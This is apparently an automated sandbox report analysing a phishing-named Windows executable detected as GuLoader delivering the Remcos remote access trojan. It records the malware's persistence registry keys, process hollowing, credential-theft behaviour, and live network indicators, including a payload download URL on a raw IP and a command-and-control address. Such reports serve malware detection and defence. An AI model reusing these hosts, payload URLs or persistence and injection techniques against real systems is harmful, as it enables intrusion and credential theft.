Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INQUIRY#46789-MAY_24_PRODUCTS.exe

Overview

General Information

Sample name:INQUIRY#46789-MAY_24_PRODUCTS.exe
Analysis ID:1447831
MD5:b0058626c77841fea067aa436ff4f1e7
SHA1:cb42fd42e35ffaab9eb7000f0e3df59c2ba4ec7a
SHA256:0459c020742f5356d25d14f2cd937ecee923a54402246dc521452a6c9b353119
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Maps a DLL or memory area into another process
Sample uses process hollowing technique
Sigma detected: Suspect Svchost Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • INQUIRY#46789-MAY_24_PRODUCTS.exe (PID: 6064 cmdline: "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe" MD5: B0058626C77841FEA067AA436FF4F1E7)
    • INQUIRY#46789-MAY_24_PRODUCTS.exe (PID: 7960 cmdline: "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe" MD5: B0058626C77841FEA067AA436FF4F1E7)
      • Vexploio.exe (PID: 548 cmdline: "C:\ProgramData\Vexplo\Vexploio.exe" MD5: B0058626C77841FEA067AA436FF4F1E7)
        • Vexploio.exe (PID: 5908 cmdline: "C:\ProgramData\Vexplo\Vexploio.exe" MD5: B0058626C77841FEA067AA436FF4F1E7)
          • svchost.exe (PID: 3016 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • Vexploio.exe (PID: 2704 cmdline: C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\natcvvveorcxxyqjtvtsuftguqn" MD5: B0058626C77841FEA067AA436FF4F1E7)
          • Vexploio.exe (PID: 1280 cmdline: C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ycymwnogcaukzemncgolxsopvfffsfc" MD5: B0058626C77841FEA067AA436FF4F1E7)
          • Vexploio.exe (PID: 7236 cmdline: C:\ProgramData\Vexplo\Vexploio.exe /stext "C:\Users\user\AppData\Local\Temp\ixefxgzzpimpkkartranixjgdmpglqsibv" MD5: B0058626C77841FEA067AA436FF4F1E7)
          • svchost.exe (PID: 1540 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 3584 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 3168 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 4344 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 2064 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 7252 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 4856 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 8140 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 2240 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 6764 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 5260 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 324 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 1268 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 5472 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 6204 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 3644 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 6760 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 7492 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 2620 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 6532 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 1248 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 6072 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 3292 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 5728 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 4824 cmdline: svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)
  • Vexploio.exe (PID: 3480 cmdline: "C:\ProgramData\Vexplo\Vexploio.exe" MD5: B0058626C77841FEA067AA436FF4F1E7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.183085374541.000000000438B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000005.00000002.178268031071.0000000004322000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.183085374541.0000000004397000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000006.00000002.178537015512.0000000005239000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000003.00000002.178258681536.0000000005139000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            7.2.Vexploio.exe.43a3d40.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\ProgramData\Vexplo\Vexploio.exe" , ParentImage: C:\ProgramData\Vexplo\Vexploio.exe, ParentProcessId: 5908, ParentProcessName: Vexploio.exe, ProcessCommandLine: svchost.exe, ProcessId: 3016, ProcessName: svchost.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\bloue\Geofaglig.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe, ProcessId: 7960, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\grewm
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\ProgramData\Vexplo\Vexploio.exe" , ParentImage: C:\ProgramData\Vexplo\Vexploio.exe, ParentProcessId: 5908, ParentProcessName: Vexploio.exe, ProcessCommandLine: svchost.exe, ProcessId: 3016, ProcessName: svchost.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Vexplo\Vexploio.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe, ProcessId: 7960, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-RXKA3P
              Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\ProgramData\Vexplo\Vexploio.exe" , ParentImage: C:\ProgramData\Vexplo\Vexploio.exe, ParentProcessId: 5908, ParentProcessName: Vexploio.exe, ProcessCommandLine: svchost.exe, ProcessId: 3016, ProcessName: svchost.exe

              Stealing of Sensitive Information

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: A1 A0 B2 A0 06 6C B2 94 86 B9 10 27 22 3D 97 D3 7D B5 3D 96 F7 6B 4E 23 17 E5 D6 CB 2E 63 46 D8 90 C8 A4 B4 2A B9 A9 59 9C 0F A1 A0 A6 E7 5B 21 F6 4E CD B9 DC D0 00 7C 1C 02 20 09 D6 45 FF 8B 55 E8 47 68 93 6C , EventID: 13, EventType: SetValue, Image: C:\ProgramData\Vexplo\Vexploio.exe, ProcessId: 5908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-RXKA3P\exepath
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\ProgramData\Vexplo\Vexploio.exeReversingLabs: Detection: 23%
              Source: C:\ProgramData\Vexplo\Vexploio.exeVirustotal: Detection: 29%Perma Link
              Source: C:\Users\user\AppData\Roaming\bloue\Geofaglig.exeReversingLabs: Detection: 23%
              Source: C:\Users\user\AppData\Roaming\bloue\Geofaglig.exeVirustotal: Detection: 29%Perma Link
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exeVirustotal: Detection: 29%Perma Link
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exeReversingLabs: Detection: 23%
              Source: Yara matchFile source: 7.2.Vexploio.exe.43a3d40.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.183085374541.000000000438B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.178268031071.0000000004322000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.183085374541.0000000004397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: INQUIRY#46789-MAY_24_PRODUCTS.exe PID: 7960, type: MEMORYSTR
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,11_2_00404423
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405768
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_004062A3 FindFirstFileA,FindClose,3_2_004062A3
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_004026FE FindFirstFileA,3_2_004026FE
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405768
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_004026FE FindFirstFileA,5_2_004026FE
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_004062A3 FindFirstFileA,FindClose,5_2_004062A3
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_351E10F1
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E6580 FindFirstFileExA,7_2_351E6580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,10_2_00405768
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_004026FE FindFirstFileA,10_2_004026FE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_004062A3 FindFirstFileA,FindClose,10_2_004062A3
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: global trafficTCP traffic: 192.168.11.20:50596 -> 64.188.26.202:1604
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /TBdmQwySFr136.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 66.63.169.15Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /TBdmQwySFr136.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 66.63.169.15Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.169.15
              Source: global trafficHTTP traffic detected: GET /TBdmQwySFr136.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 66.63.169.15Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /TBdmQwySFr136.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 66.63.169.15Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Vexploio.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000005.00000002.178268031071.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000005.00000002.178269277902.0000000006150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://66.63.169.15/TBdmQwySFr136.bin
              Source: svchost.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000000.177982856555.000000000040A000.00000008.00000001.01000000.00000004.sdmp, INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmp, INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000005.00000000.178114881333.000000000040A000.00000008.00000001.01000000.00000004.sdmp, Vexploio.exe, 00000006.00000002.178534922602.000000000040A000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: Vexploio.exeString found in binary or memory: http://www.nirsoft.net/
              Source: Vexploio.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: Vexploio.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_00405205
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_0040987A
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 7.2.Vexploio.exe.43a3d40.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.183085374541.000000000438B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.178268031071.0000000004322000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.183085374541.0000000004397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: INQUIRY#46789-MAY_24_PRODUCTS.exe PID: 7960, type: MEMORYSTR
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess Stats: CPU usage > 6%
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040320C
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040320C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_0040320C
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_00404A443_2_00404A44
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_00406F543_2_00406F54
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_0040677D3_2_0040677D
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_6E131A983_2_6E131A98
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_00404A445_2_00404A44
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_00406F545_2_00406F54
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_0040677D5_2_0040677D
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 6_2_6F271A986_2_6F271A98
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351F71947_2_351F7194
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351EB5C17_2_351EB5C1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00404A4410_2_00404A44
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00406F5410_2_00406F54
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0040677D10_2_0040677D
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00406E8F11_2_00406E8F
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044B04011_2_0044B040
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0043610D11_2_0043610D
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044731011_2_00447310
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044A49011_2_0044A490
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0040755A11_2_0040755A
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0043C56011_2_0043C560
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044B61011_2_0044B610
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044D6C011_2_0044D6C0
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_004476F011_2_004476F0
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044B87011_2_0044B870
